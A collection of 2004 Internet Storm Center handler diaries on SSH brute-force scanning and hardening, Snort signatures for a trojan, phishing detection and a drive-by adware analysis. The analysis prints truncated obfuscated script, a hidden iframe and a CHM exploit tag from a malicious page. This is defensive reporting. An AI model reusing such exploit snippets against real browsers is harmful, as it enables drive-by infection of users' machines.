Published: 2004-08-31

MTBF Blues

MTBF Blues

Sometime, somewhere, when you least expect it, you're going to find yourself sitting on the wrong side of those MTBF statistics. Trust me.

As packet nerds, sometimes it's easy for us to forget that all of these bit and bytes actually flow over hardware. And hardware has this nasty physicality about it, unlike the ephemeral world of packets and protocols. If you think facing the thought of your own mortality is a scary thing, then you don't even want to consider the consequences of that shiny new 7,200 RPM drive in your mailserver deciding to become a 0 RPM drive. Once again: trust me.

We all know the machines within our organization that we deem "business critical." But increasingly, as we all find ourselves piling more and more functionality onto existing equipment in order to stretch our IT budgets, there are a class of machines that don't quite make it to the "business critical" category but still carry enough of a load that their loss will cause you incredible headaches. I would place these machines in the "PITA" category, because it's a Pain In The A** if they die.

Last night, one of my PITA machines died. Because stress levels in the IT industry are high enough, rather than raise anyone’s blood pressure with anticipatory angst, I'll clue you in-- while the trip itself wasn't pretty, there is a happy ending: the machine is up and running again. Along the way, though, I learned a few things that I thought I'd pass along. Consider these "Rules of Thumb For Hardware Nightmares":

1) Rack mount machines look nice, no doubt about it, but they were never meant to be worked on. If the fellow who invented them were anywhere near me last night, he would be 1U high right now. Enough said.

2) Cables, once removed, will become so horribly entangled with each other, themselves, cables leading to other equipment, your shoestrings, cobwebs, belt loops, and, generally, anything longer than it is wide, that they will never again reach back to where they were originally placed.

3) Did I mention that I hate that rack-mount guy?

4) Backups are a good thing.

5) The final screw holding up a rackmount server is always possessed by demons. As is the first one you try putting in when putting the server back.

6) Shutting down a server to replace one component will cause several others to fail. One must assume that God has it in for IT people.

7) Backups are a very, very good thing.

8) You will always remember that you forgot to replace at least one cable AFTER you've tightened the last screw when placing the server back in the rack. Twice.

9) Perhaps God and the guy who invented rack mount servers are in cahoots.

10) Did I mention that backups are a good thing?

So Tom, what's the point? Well, aside from the fact that the Internet could have come to a flaming end sometime last night and I would have been too busy to notice... and thus I needed some "filler" for my diary... it's simply this: Check your backups. Make sure that you're backing up not just the "business critical" machines in your infrastructure, but also your PITA machines too. Make sure that your backups work. Make sure that you can RESTORE them when you need them.

Of all the problems and hassles and "issues" that I had breathing life back into my dead PITA server, the ONLY thing that went 100% smoothly was restoring from backup.

Now if you'll excuse me, I need to find my cable stretcher...


Handler on Duty : Tom Liston ( http://www.labreatechnologies.com )


Published: 2004-08-30

Port 6346; Improved Signature for Trojan Win32/Small.AR; Clarification on SSH Advice for Repeated Hack Attempts

Port 6346

Several people wrote in today suggesting that the increase in traffic on tcp/6346 is due to increased Gnutella activity since many schools have started this week and more students are online with high-speed connections.

Improved Signature for Trojan Win32/Small.AR

nnposter submitted an additional Snort signature for the Win32/Small.AR trojan. He wrote:

"The following revision of the presented rule for Win32/Small.AR has substantially smaller processing overhead while generating fewer false positives:

alert tcp any any -> any 80 (msg:"Win32/Small.AR outbound activity"; flow:to_server,established; uricontent:"/zosman/cia/index.php"; classtype:trojan-activity; sid:5000824; rev:2;)

Further optimization can be achieved by replacing 'any' with $INTERNAL_NET and/or $EXTERNAL_NET but this would be dependent on deployment specifics."

Clarification on SSH Advice for Repeated Hack Attempts

In yesterday's diary, the suggestion was made that to reduce the amount of connection probes to your SSH daemon being made by the current series of automated scanners, you could configure it to listen on a non-default port.

Many folks wrote into today with opinions about "security through obscurity" and indicating that they thought the recommendation was a bad idea.

If you look at the last paragraph of Bill's suggestion from yesterday, you will see he said:

"The above is aptly described as 'security through obscurity', and generally discouraged as the _sole_ protective measure for a system. Moving ssh to a different port doesn't absolve us from performing all the other security steps (patching, firewall, locking down ports, services and users, etc). It does make it harder for the casual prober, though, and that might be enough to handle the issue if the ISP won't."

We fully agree with everyone that there are many other improvements that can be made to better secure your SSH connections. Some of those improvements are:

- use tcp_wrappers/iptables/ipfw/etc to restrict who is allowed to connect to the port on which you are running sshd.

- set "PermitRootLogin no" in the sshd_config file to disallow people from logging in directly as root through an SSH connection.

- set "PasswordAuthentication no" in the sshd_config file to disallow the use of local passwords. This would require the use of SSH public/private keypairs or an additional two-factor authentication method.

- if you use local passwords, ensure that your users are using strong passwords.


Published: 2004-08-29

Port 6346 increase; Mail bag: trojan Win32/Small.AR; SSH Advice for Repeated Hack Attempts

The past day has been pretty slow, with mainly the usual network noise. Here are some things of interest:

Port 6346 Increase

There has been an increase of traffic on this port, mainly for sources and records. If anyone is seeing this and has any captures, please let us know.

trojan Win32/Small.AR

We would like to thank Chris Norton for his analysis of this trojan and for offering a Snort signature for it. He writes:

"Here we see Small.AR contacting 2 websites [members.chello.nl], [redirectf.dnsix.com]. As to what it was trying to do that remains a mystery as you will find out: HTTP GET
/zosman/cia/index.php HTTP/1.1 HTTP HTTP/1.1 404 Not
Found (text/html) HTTP GET /index.php?
HTTP/1.1 HTTP HTTP/1.1 302 Found


the last request was followed by an ACK, FIN/ACK. All that was tried on was a GET /index.php? followed by a 302 and ACK, FIN/ACK.

Here in filemon we can see just what this trojan creates/touches:

[here it creates mssyncr.exe and writes data to it]
7:00:00 PM trojan.exe:720 CREATE C:\WINNT\System32\mssyncr.exe
SUCCESS Options: OverwriteIf Sequential Access: All

7:00:00 PM trojan.exe:720 WRITE C:\WINNT\System32\mssyncr.exe
SUCCESS Offset: 0 Length: 11820

7:00:00 PM trojan.exe:720 WRITE C:\WINNT\System32\mssyncr.exe
SUCCESS Offset: 0 Length: 12288

7:00:00 PM trojan.exe:720 WRITE C:\WINNT\System32\mssyncr.exe
SUCCESS Offset: 0 Length: 12288

other than the usal calls to the dll's needed to run the .exe that is all that was "suspicious"."

He also offers this Snort signature:

alert ip any any -> any any (msg:"Win32/Small.AR outbound activity"; uricontent:"/zosman/cia/index.php"; classtype:trojan-activity; sid:5000824; rev:1;)
SSH Advice for Repeated Hack Attempts

We have received numberous reports on the SSH scanning and brute force attempts. As such, fellow handler Bill Stearns offered some good advice to someone that was receiving continual scans and brute force attempts. I would like to pass along his response and hopefully it will help others. Also, if you've never checked out his website, you really should as there are lots of great resources! It can be found at

And now for some great advice from Bill:

"You're doing the right thing by reporting the scanner.
Unfortunately, if the ISP can't or won't remove the user's access, you're
left with the nagging question of "OK, the prober hasn't gotten in so far
because they don't have a valid username and password; what happens when
they get one?"
Might I suggest a distressingly simple way to avoid the probes?
Move your ssh servers to a different port. :-) This doesn't stop the
prober, but it gives you one more small roadblock for them; unless they're
specifically targetting you and decide to do a full portscan, they won't
find the ssh server.

If this is a remote box, I'd do this at a time when there are tech
people at your ISP so if something goes wrong you can set things back.
For your Internet accessible ssh servers, change the ssh port used. First, open 3 ssh connections to the box. That gives you some terminals on which to type if ssh doesn't restart or you can't get in for some reason. On Redhat/Fedora Linux, add the port number to the "OPTIONS" line in /etc/sysconfig/sshd :

[root@mysshserver root]# cat /etc/sysconfig/sshd

OPTIONS='-p 1011'

Once you've configured TCP wrappers and/or your firewall to allow incoming connections on the new port (allow traffic on port 22 as well until you're sure this still works), restart sshd:

/etc/init.d/sshd restart

The primary daemon will restart, but your existing ssh connections
on the old port 22 should stay open for emergencies.
On the client, (again, openssh, although nothing I describe here
is particular to openssh, Redhat/Fedora, or even Linux; all ssh clients
and servers can be convinced to use a different port), edit ~/.ssh/config
and add a block like this (substitute the real name of the machine for

Host mysshserver
Port 1011

Now run

ssh mysshserver

and you should be in. Use

ssh -v mysshserver

if you have trouble and need to debug.
Even programs like scp, sftp, and rsync-over-ssh will work just fine with no additional configuration; they all indirectly access ~/.ssh/config and use the port setting. Note that if you ever access this system by a different name (such as "mysshserver.whoevertech.com"), you'll want to add a similar ssh block starting with "Host mysshserver.whoevertech.com").

The above is aptly described as "security through obscurity", and
generally discouraged as the _sole_ protective measure for a system.
Moving ssh to a different port doesn't absolve us from performing all the
other security steps (patching, firewall, locking down ports, services and
users, etc). It does make it harder for the casual prober, though, and
that might be enough to handle the issue if the ISP won't."

1.gif Trojan - Update III

AV providers have provided updated signatures for the 1.gif email Trojan.

TrendMicro - Excellent analysis




Lorna J. Hutcheson

Handler on Duty



Published: 2004-08-28

New AV Updates; TEMPEST makes a comeback

McAfee releases update for 1.gif trojan
This trojan takes advantage of the exploits covered in Microsoft Security Bulletin MS03-032 or Microsoft Security Bulletin MS03-040. McAfee notes that if these patches are applied, you are immune from this virus. McAfee will still and identify the trojan with the latest updates applied.
Compromising Emanations - a new study on an old technique
Markus G. Kuhn has done a study of compromising emanations, or TEMPEST,, and it is worth discussing a bit here. This is the technique of using signals emanating from computer and communications equipment for the purpose of eavesdropping. It is not the first study that has been done, this has been an area of interest for the Government for almost 50 years. Over time they have used many different approaches to combat the compromising emanations, including shielding, signal separation, and isolation techniques. Today's signaling and communications equipment, as opposed to what existed 25 years ago, uses a much lower voltage levels for the processing of the signal. The trend for TEMPEST defense waned a bit, with newer equipment being immune to the eavesdropping equipment of yesterday due to the extreme low level voltages used for signal processing. However, with the advent of newer technologies developed to exploit today’s equipment TEMPEST is drawing attention once again. The article referenced by Mr. Kuhn described in this report demonstrates “how to make information emitted via the video signal more easily receivable, how to recover plaintext from emanations via radio-character recognition, how to estimate remotely precise video-timing parameters, and how to protect displayed text from radio-frequency eavesdroppers by using specialized screen drivers with a carefully selected video card.” Today we are most concerned about protecting data from sources that directly access it. This is a new concept for a lot of administrators out there, and well worth the read. More than anything, it will introduce a new approach to data compromise.


Tony Carothers

Handler on Duty



Published: 2004-08-27

Cisco Telnet DoS Vulnerability / Suspicious GIF files being mailed? / Paranoia, the right dosage

Cisco Telnet DoS Vulnerability

Cisco released information about a vulnerability where they advise their customers to protect themselves from an actively used technique that prohibits network based administrative connections to their devices.

We released an initial warning this morning, to allow those needing the extra time to plan for this one.

This vulnerability should not affect the data flowing through the router.

Read more:

Suggested defensive actions:

- upgrade

- filter telnet connections using access control lists

- remove telnet support and switch to ssh (highly recommended anyway)

Suspicious GIF files being mailed?

There are an increasing amount of suspicious gif attachments to email reported to us.

The filenames 1.gif and 2.gif seem to be popular, but it looks like the exploit isn't in the gifs, but rather in the body of the message that tries to download from a -currently down- website.

The reports so far indicate outlook warns about ActiveX permissions, but that might not be the case in all instances.

Our best preventive advise would be to disable preview panes in outlook, keep anti-virus software up to date at all times, and perhaps consider to return email to plain text as much as possible both when sending and receiving messages.

Paranoia, the right dosage

At the ISC we get all sorts of messages, what stood out today to me was the need for the right level of paranoia.

It seems to be hard for individuals and organizations to have the right dose of paranoia. E.g. when dealing with phishing scams individuals being targeted could use a lot more paranoia; even security experts every so often could use more paranoia and be wearier of things happening to them.

From a security point of view things might lead to a "can't have enough paranoia" statement.

That's where I think we need to disagree and I think we need to have even in the information security world a point where we do trust our suppliers, partners to do the right thing.

The reasoning that leads to too much paranoia often also leads in the information security world to an imbalance between the 3 pillars information security is built on: Confidentiality, Integrity and Availability.
We shouldn't sacrifice all availability for a bit more confidentiality. In the end information security needs to support the business, not cripple it.

I include myself among those sometimes having the wrong level of paranoia, but knowing it allows you to correct it a bit faster.


Swa Frantzen


Published: 2004-08-26

The Prototype Still Works; Insider Threat Paper; More Keylogging; Translation

The Prototype Still Works After nearly 35 years of continuous service (the first node on the ARPANET was connected on September 2nd, 1969 - anybody throwing a party one week from today?) the experimental prototype network still works. I say "prototype" in reference to a quote that I heard a friend of mine say at DARPA a few years ago concerning the Internet, "Perhaps now it is time to quit experimenting with the prototype and build the real thing." How true! Especially when you consider that today's Internet is largely built on protocols developed in the 1970s. As I tell my students in various SANS classes, we've got to start thinking toward the future and push hard for secure replacements for all of the Internet protocols, including infamous ones like TCP/IP. In 35 years when the 'net is 70, will we still be using SMTP, FTP, telnet, and countless other "ancient" protocols?

Insider Threat Paper The CERT Coordination Center recently published an excellent paper on the insider threat facing banks and other financial institutions. This one is worth a read: http://www.cert.org/archive/pdf/bankfin040820.pdf

More Keylogging We had yet another report of keystroke logging, most likely by a Russian group. The keylogger sends data to an FTP site located in the netblock. This block is assigned to an ISP in San Diego and they've been notified. Check your netflows for activity to this block and investigate if you find anything. Many of the keyloggers we are seeing are using FTP to transfer the captured data, so a simple Snort alert looking for outbound FTP connections or FTP commands might provide an early warning about a hijacked box.

Enough Translations, Thanks! We really appreciate all of the people who sent in translations for what was found in Joe's computer (Follow the Bouncing Malware, part II, http://isc.sans.org/diary.php?date=2004-08-23 .) I think that we've got it nailed down now as:

"Hara Hara Mahadev !!!

tum agar badshah hai to hum eespeek ka yekka!"

Hara Hara Mahadev is a war cry used by Maratha Warriors of old days from the state of Maharashtra in India. One can equate that to the Ranger's Warcry ("Rangers Lead the Way!")

Literally translated, the second line means, "If you are King then I am Ace of Spades."

Thanks, BSD Guy for the translation that makes the most sense.

Marcus H. Sachs

Handler on Duty


Published: 2004-08-25

Outlook Express Weakness / Solaris Apache Bug / Winamp Exploitation / Translations / End of Internet / Social Engineering Story

Outlook Express Weakness

Today we received a report from Juha-Matti Laurio. He reported a flaw in Outlook Express 6, which may disclose email addresses in "BCC:" fields to other recipients when sending multipart messages, which is disabled by default.

This weakness was confirmed by our ISC Handler Lorna, which gave a simple and complete explanation:

"Just like fragmentation...only the first email from the fragmented original
message contains the Bcc list."

Juha-Matti also reported it to Secunia, which published an advisory about it with more details.

Reference: http://secunia.com/advisories/12376/

Solaris Apache Bug

Another interesting advisory from Secunia is about Multiple Vulnerabilities in Apache for Sun Solaris. "These vulnerabilities can be exploited to bypass certain security restrictions, cause a DoS (Denial of Service), or potentially compromise a vulnerable system."

Time to Patch!

Reference: http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/57628

Winamp Exploit used in the wild

We received information about Winamp vulnerability being exploited. An exploit is already public available and is reported being used in the wild.

Reference: http://secunia.com/advisories/12381/


ISC Handler Tom Liston, on his diary on August 23rd, on the 'Follow the Bouncing Malware, Part II' topic,mentioned:

"...And some downright bizarre stuff:

Hara Hara Mahadev !!!

tum agar badshah hai to hum eespeek ka yekka!

(Would anyone care to enlighten me?)"

A reader sent the translation to us:

"This appears to be Hindi, the translation of which is approximately:

Illuminating, Illuminating Eminence!!!

If you are a king then accept a lesson of a bug!"


"Hara Hara Mahadev !!!

tum agar badshah hai to hum eespeek ka yekka!"

Green green big king!!!

If you are a king then we are Ace of (what ever eespeek is)

End of Internet

An update about 'The End of Internet' prediction came from VirusList website.

According the VirusList website, some news agencies misinterpreted Kaspersky words.
"...The story stems from brief comments made
yesterday at a press conference which was dedicated to cybercrime and the
problems of spam.

At this press conference, Kaspersky commented that the possibility of
terrorists using the Internet as a tool to attack certain countries was
a reality. As an example, he cited the fact that a number of Arabic and
Hebrew language websites contained an announcement of an 'electronic
jihad' against Israel, to start on 26th August 2004."

Reference: http://www.viruslist.com/eng/index.html?tnews=461517&id=2100900

Social Engineering

This is a little story about social engineering and what you could do to avoid future problems.

Average Joe's wife received a phone call about 7:00pm from an alleged employee of Joe's adsl phone company provider, offering a software called SoS-Phone, to be installed in Joe's computer, to enhance the internal network security, for a cost of only 1 dollar/month. For that, he had to arrange a visit to Joe's house to check the computer environment.

Average Joe's wife ask the guy to call later because she had to talk to his husband first and he wasnt there. Then, she called his brother-in-law asking about that, because Joe's brother works in the security department of the same Phone Company!:) and then discovered that there was no such product!

Possible usage of this attack:

- Install malicious software to steal credit card number, passwords...

- Use this to get into your home and rob your house

- ...

In this example, if she wasn't lucky enough to have someone that she could verify, she could follow some steps to identify such scams:

- Check with the company if such product really exists, using 800 numbers, internet...

- Ask for name and a phone number that you could call back and verify the credentials

- use your common sense

believe...this CAN happen...

I am Joe's brother and this happened yesterday...:)


Olympic Games 2004 Status: Brazil 2 Gold/ 1 Silver/ 2 Bronze

Handler on Duty: Pedro Bueno <bueno/AT/ieee.org>


Published: 2004-08-24

Submitting Malware - Unpatched IE Hole Being Exploited - eJihad or iHysteria?

Submitting Malware

ISC reader Chris Norton discovered an unknown binary in his C:\WINDOWS directory attempting to access the Internet last night. After a scan with an up-to-date virus scanner provided no salient information, Chris submitted the binary to the ISC, along with some preliminary analysis and supporting information. ISC handlers ran the code past numerous current antivirus products to no avail. The code was then submitted to antivirus vendors and analysis began.

The point to this story isn't the identification of the malware (a new variant in the Small Trojan/Downloader family) but the steps taken by Chris before submission. Chris did everything right, which made interaction with the ISC much more fruitful for all parties. We gladly accept all malware submissions (Tom Liston is looking for material for his upcoming novel "Malware and Me: A Love Story"), but by following a few simple guidelines, you can help us help you. [Cory, Cory, Cory... *I* know that when one uses a co-ordinate phrase as a subject, the proper form is, "Malware and I: A Love Story." Did Yul Brenner star in "The King and Me"? I think not... -TL]

1) Make sure to run the binary through *current* antivirus before submitting. Additionally, submitting the binary to a service like VirusTotal (
http://www.virustotal.com ) is a good way to get a multi-AV view of what exactly you've got your hands on.

2) Include as much relevant information as possible about the state this code was found in. This could include things like any actions that may have triggered the installation/execution, any system behavior that appears to be a result of this code, packet captures of traffic generated, any other files that appear to be related, etc.

3) If you're capable and willing, continue investigating on your own.* If nothing else, it's a great learning experience, and there's a good chance you'll be able to discover things the ISC won't, as you're in possession of the entire impacted machine, instead of a few small pieces. Keep the ISC informed of findings, though, if you do decide to investigate on your own - especially if you discover that it's some innocent program ten minutes after submitting it to us. ;)

*If you are acting as part of an organization with an established incident response policy, DO NOT investigate on your own. Your incident response team will likely be very upset at receiving freelance assistance.

Unpatched Internet Explorer Hole Being Actively Exploited

SP2 must have changed something in the Matrix, because I've got a case of deja-vu all over again! The ISC is receiving reports that a currently unpatched IE vulnerability ( discovered by http-equiv, details here:
http://secunia.com/advisories/12321 ) is being actively exploited in the wild. If you run across this *on a fully patched box* please submit the offending URL and any dropped (dragged 'n' dropped in this case) malcode to the ISC.

e-Jihad Begins Thursday, Internet Predicted to Melt Down by Mid-day

You should probably starting backing up that gig of gmail to local storage. According to a Russian news site, Kaspersky Labs states that terrorists will launch attacks which will paralyze the Internet this Thursday. This tragically coincides with two weeks of script kiddie attacks (which were scheduled to begin this past Sunday) aimed at disrupting the Republican national convention. In addition, many college students are back on campus this week, which provides the e-terrorists and i-subversives with a veritable candyland of insecure boxes on big pipes. Faced with this triple threat, our beloved Internet will surely fall.

The ISC would like to go out on a limb and predict that the Internet will not vaporize into a cloud of nothingness this Thursday, but if it does, it's been our pleasure to help stave off its inevitable annihilation this long.


Cory Altheide




Published: 2004-08-23

MS Help For SP2 Setup Problems, The Phishin' Hole, Follow the Bouncing Malware, Part II

NOTE: We have received reports that McAfee's antivirus product tags this page as containing "Exploit-MhtRedir.gen". The signature for McAfee is triggering on one of the dead-listings of JavaScript on this page. -TL

NOTE#2: I've changed "<>" to "[]" on some of the JavaScript tags to try to avoid the false positives. -TL

What to do for an SP2 "Uh oh…"

How to recover your computer if the WinXP SP2 Setup program is not completed successfully


Applies to:

* Microsoft Windows XP Professional Service Pack 2 (SP2)

* Microsoft Windows XP Home Edition Service Pack 2 (SP2)

* Microsoft Windows XP Media Center Edition Service Pack 2 (SP2)

* Microsoft Windows XP Tablet PC Edition 2005

(Thank you, Jack!)

Gather 'round the Phishin' Hole

If your business is a likely target for a phishing scam, what can you do besides sitting around, waiting to react to the next wave of scams that try to separate your customers from their money? How about taking a look at your weblogs for suspicious referrers?

Many of the phishing sites that we have seen use graphics that are loaded directly from their targets servers. Oftentimes, the site will also redirect a scammed visitor to the real website when the scam has run its course.

If you find a site that is referring to your servers for graphics, it should be a dead giveaway that someone out there probably has a hook in the water.

Watch the referrers on inbound connections to login pages. Create and maintain a database of known-good referrers and use it to remove legitimate references from your referrer logs, and check out the rest. Consider using server side rules to redirect referrals from known phishing sites to special pages explaining to customers that they may have been scammed and what they should be doing.

In all of the time that we've been watching these phishing scams happen, we have yet to see any target that is using the tools and information available to them in an effective way. Phishing scams are not going to go away. It's time that likely targets began to put some thought into limiting their damage.

(Thank you, Swa!)

Follow the Bouncing Malware – Part II

Note: The links in this part of the diary are purposely not clickable. DO NOT GO TO THESE SITES. THIS MEANS YOU. REALLY.

Welcome back to Part II of our journey through the seamier side of the internet. To those of you who wrote in asking, I’m sorry it took so long to get this put together and up...

In case you missed Part I, or in case you simply want to review, here's a link to where we started:


Go on... I’ll wait.

Ready? Good.

When we last left our intrepid "Joe Average" computer user, he had just installed Windows XP Home Edition, and gone out on the Internet in search of some fun and adventure. If you recall, someone had told him about Yahoo! Games and he wanted to try them out. Using Google, and ignoring (for whatever reason) several obvious links to Yahoo!, he scrolled down near the bottom of the first Google search page and clicked on a link leading to www.yahoogamez.com.

That's when the fun began.

With an IFRAME here and a CHM exploit there, Joe Average’s shiny new computer was transformed into something new... something Joe never dreamed it would become: an S.E.P.

"Somebody Else’s PC."


Well, although Joe still owns (letter "o") the hardware, and gets the privilege of supplying it with electricity and an internet connection, someone else now 0wns (zero) his computer, and they’re making all of Joe's bright and shiny hardware dance to a tune that THEY’RE playing.

You see: All Joe wants his hardware to do is stop all of this nonsense and leave him in peace to play a rousing round of "Donut Boy 2" from the yahoogamez site. But the new happy-go-lucky pals that he's picked up while browsing have some other things in mind...

When I paused our adventure at the end of Part I, the list of "stuff" done to Joe's computer looked like this:

1) Joe's homepage had been changed. It is now set to:


2) The default search page has been set to:


3) Search assist has been turned off.

4) "TV Media Display" has been installed on Joe's machine (more on this later.)

5) addictivetechnologies.net had graced Joe's machine with a file identified by AV software as Win32/TrojanDownloader.Rameh.C.

So... what do Joe Average's new found buddies have planned for him next? Let's find out together as we continue to follow the bouncing malware.

Let's start by taking a look inside the file that Addictive Technologies "gave" to Joe. If you’ll recall, it was a .cab file called "fr03tp.cab," containing two files:

ATPartners.inf – 403 bytes

ATPartners.dll – 96,256 bytes

(Some editorializing: The ATPartners.dll contains a statically linked copy of the MSVC runtime. This is completely unnecessary. Addictive Technologies: If you're going to write malware, at least write EFFICIENT malware.)

Looking at the strings contained within the .dll file, we find some interesting stuff:

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects

And some downright bizarre stuff:

Hara Hara Mahadev !!!
tum agar badshah hai to hum eespeek ka yekka!

(Would anyone care to enlighten me?)

Putting some obvious "stuff" from that list together, we get ourselves a URL:


where we find the following interesting message:


Name=Gamehouse Games

Name=Big Fish Games

Name=FlyorDie Games




(Is it just me, or did anyone else find the term "softsell" in the above "RegNow" URLs more than a bit amusing?)

Hey look! More stuff was "updated" on Joe's computer: Let's see... They're adding some stuff to Joe's Internet "Favorites" to advertise purchase links for games that AT gets affiliate bucks for (Gamehouse Games, Big Fish Games, and FlyorDie Games), they've added a link on Joe's Desktop to "007arcadegames," and they're downloading more gifts for Joe: ezbdlLs.dll and SplWbr.dll.

SplWbr.dll weighs in at a whopping 454,656 bytes and is what is known in the AntiVirus biz as a "file dropper." That is, when it is executed, it writes out and installs or executes one or more files that are attached to it as data. In this case, it drops out two files:

Drop#1 – 135,088 bytes which claims to be "Ad Destroyer and Virtual Bouncer Installation" and is digitally signed by Spyware Labs, Inc. (www.spywarelabs.com).

Drop#2 – 302,544 bytes which silently installs "TopRebates.com AutoTrack software" (www.toprebates.com).

ezbdlLs.dll is a 151,040 byte UPX compressed .dll that expands to 176,128 bytes when uncompressed. It too is a file dropper, gracing Joe's machine with three new gifts:

Drop#1 – 65,536 bytes of ASPacked goodness from www.abetterinternet.com which claims to be a "[u]tility for downloading files and upgrading software. Visit www.abetterinternet.com for more info."

Drop#2 – 33,280 bytes of UPX packed fun which expands into 65,536 bytes of crappy software engineering from the fine folks at ezULA (www.ezula.com) who’s stated goal is "Making Your Internet Browsing Simple, Exciting, and Personal." Uh... no thank you.

Drop#3 – 65,024 bytes filled with a NullSoft Installer that gifts Joe's machine with SAHAgent, a Winsock2 Layered Service Provider (LSP) that installs itself in Joe's WinSock stack, much like a personal firewall. SAHAgent redirects select web traffic to cause online purchases made by Joe to be done in a way that will route any affiliate bucks to a specific affiliate ID.

So, what's the upshot of this whole mess? Well, Joe has had five new software packages installed onto his machine, redirecting his browsing, his searching, and his online purchases to suit the desires of the (no-doubt ;-) fine, upstanding people at ATPartners. His Internet browsing will now be "Simple, Exciting, and Personal" (ezula), he’ll always know that "The Best Downloads are Free" (abetterinternet), his computer will show him the "Smart way to put money in your pocket" (TopRebates) and he needn’t worry about adware/spyware any more because Virtual Bouncer has been installed to... uh... bounce it (Spyware Labs). Oh, and his online purchases will earn money for... uh... um.... someone. (SAHAgent). Joe should be so very, very happy.

But did you happen to notice THIS section in the text-file o' instructions that the ATPartners.dll downloaded?


Next time around, we’re going to download a DIFFERENT set of "configuration" instructions:









Just looking at that list makes me tired. (And the name "ezStD" makes me laugh… For those non-English speakers out there, STD is an acronym for "Sexually Transmitted Disease" :-) I could slog down through the whole sorry mess, and perhaps I will if there is enough interest, but for now let's take a look at another area where Joe is no longer the 0wner of his P.C.: his homepage.

Joe's homepage was changed in the initial "drive-by" to be "http://default-homepage-network.com/start.cgi?new-hkcu". The next time that Joe fires up IE, here’s what he gets (suitably edited to remove superfluous crud):

<title>Default Homepage Network</title>
[script language=javascript]
var agt=navigator.userAgent.toLowerCase();
var is_ie = (agt.indexOf("msie") != -1);
var is_aol = (agt.indexOf("aol") != -1);

if (!is_aol) {
if (!is_aol) {
var expdate = new Date((new Date()).getTime() + 600000);
if (document.cookie.indexOf("delayed") == -1) {
"delayed=general; expires=" + expdate.toGMTString() + "; path=/;";
splashWin2 = window.open("",'y','fullscreen=1,toolbar=0,location=0,\

The referenced file, "newspynotice.html," is another rather interesting little gem. It displays a big red stop sign, and explains that poor Joe’s computer may be infected with spyware. Has Joe noticed that his home page has been changed? (Well, duh!) Has his computer been acting "wierd" lately? (Why can’t these malware clowns spell?) Is the Internet "running slow or crashing?" If so, Joe simply needs to click on a link on the page and his "computer will be back to normal and secure again in just a few minutes." Oh, joy... oh, joy.
But, hidden within the HTML of this “IMPORTANT SECURITY NOTICE!” page is a little surprise:

<!-- 1. newobj1 -->

[script type="text/javascript"]document.write('\u003c\u0073\u0063\u0072\u0069\u0070

<!-- 2. e1 -->

[script type="text/javascript"]document.write('\u003c\u0069\u0066\u0072\u0061\u006d

A little decoding gives us Part 1:

[script language=javascript]
var oPopup = window.createPopup();
function showPopup() {
oPopup.document.body.innerHTML = "<object\

And Part 2:

[iframe src="" width=1 height=1][/iframe]

This recalls the hp2.htm file that was downloaded and installed in Part I of this epic adventure. Same site, same method, same result:

<!-- NEW Z.D.E.-D.B.D. w/ vu083003-H.P.S. (c) April 2004 SmartBot -->

[script type="text/javascript"]document.write('\u003c\u0074\u0065\u0078\u0074\u0061

Once again, this isn’t difficult to decode, and results in:

<textarea id="code" style="display:none;">
[object data="&#109;s-its:mhtml:file://C:\foo.mht!${PATH}/HP1.CHM::/hp1.htm"\
[script language="javascript"]

Another .chm exploit that will eventually result in the download and execution of a file called hp1.exe.

Here we go again... and trust me, hp1.exe is a real piece of work.

Stay tuned for Part III...

Note: When I first started writing this up, I was completely unaware of how deeply down the rabbit hole it would take me. I honestly believed that it would only be a fairly long diary entry... then two fairly long diary entries... and now it is obvious that we’re heading into three parts at the very least. I’ll try to get Part III (and any other remaining posts) up more quickly.

Handler on Duty: Tom Liston ( http://www.labreatechnologies.com )


Published: 2004-08-22

SSH Scanning Resolved; First Things First Guide

SSH Scanning

Joel Esler brought to our attention a new version of the brutessh code that has been posted and appears to match the scanning that we have been seeing lately. It appears that we finally have a solution to our mystery. Thanks for all the folks who submitted information and for everyone's time and effort that was put forth to coming up with a resolution!!

First Things First Guide: An Introduction to Network Security

We have received alot of questions from folks wanting to learn more about network security and how to get started. Here is a guide that was written to do just that and to hopefully point people in the right direction. If you have any comments that would make it better, please let me know. Here is the link

Lorna J. Hutcheson

Handler on Duty



Published: 2004-08-21

Port 559 and 65506

Port 559

Based on two days ago diary on port 559, we received some packet captures from Timothy. Part of the logs is described as follows:

For every 256 bytes, I always responded with a standard response consisting of 256 bytes. I noticed two patterns: 16, 30, 31, or 39 X 256-byte packets consisting of 00 (this was every ip address but one); and, a 7-byte message consisting of the following (expressed as hexadecimal):
04 01 00 50 D9 6A E8 11

If you see any similarities or differences, do let us know.

Port 65506

We also received a submission that there is a spike on port 65506. Part of the packet capture is as follows:

Type: IP (0x0800)

Trailer: 0000000000

Internet Protocol, Src Addr: xx.xx.146.95 (xx.xx.146.95), Dst Addr:
xx.xx.0.31 (xx.xx.0.31)

Version: 4

Header length: 20 bytes

Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)

0000 00.. = Differentiated Services Codepoint: Default (0x00)

.... ..0. = ECN-Capable Transport (ECT): 0

.... ...0 = ECN-CE: 0

Total Length: 41

Identification: 0xc0ac (49324)

Flags: 0x04 (Don't Fragment)

0... = Reserved bit: Not set

.1.. = Don't fragment: Set

..0. = More fragments: Not set

Fragment offset: 0

Time to live: 117

Protocol: TCP (0x06)

Header checksum: 0x2211 (correct)

Source: xx.xx.146.95 (xx.xx.146.95)

Destination: xx.xx.0.31 (xx.xx.0.31)

Transmission Control Protocol, Src Port: 3769 (3769), Dst Port: 65506
(65506), Seq: 0, Ack: 0, Len: 1

Source port: 3769 (3769)

Destination port: 65506 (65506)

Sequence number: 0 (relative sequence number)

Next sequence number: 1 (relative sequence number)

Acknowledgement number: 0 (relative ack number)

Header length: 20 bytes

Flags: 0x0010 (ACK)

0... .... = Congestion Window Reduced (CWR): Not set

.0.. .... = ECN-Echo: Not set

..0. .... = Urgent: Not set

...1 .... = Acknowledgment: Set

.... 0... = Push: Not set

.... .0.. = Reset: Not set

.... ..0. = Syn: Not set

.... ...0 = Fin: Not set

Window size: 16616

Checksum: 0x483c (correct)

Data (1 byte)

0000 43

ISC data also shows that there is a huge increase of traffic on this port for the last two days:


One of our handlers, Deb, pointed out that this pattern was seen in Mar and May about the same time each month lasting until around the end of the month:


Could this be the same old bug, scanning for Phatbot SSL Proxy? Let us know if you have further information on this.


Published: 2004-08-20

OpenSSH 3.9 has just been released, Rumors of new Download.Ject Worm, SEC Warning about Telephone Fraud Scam, My Favorite Quote of the Day

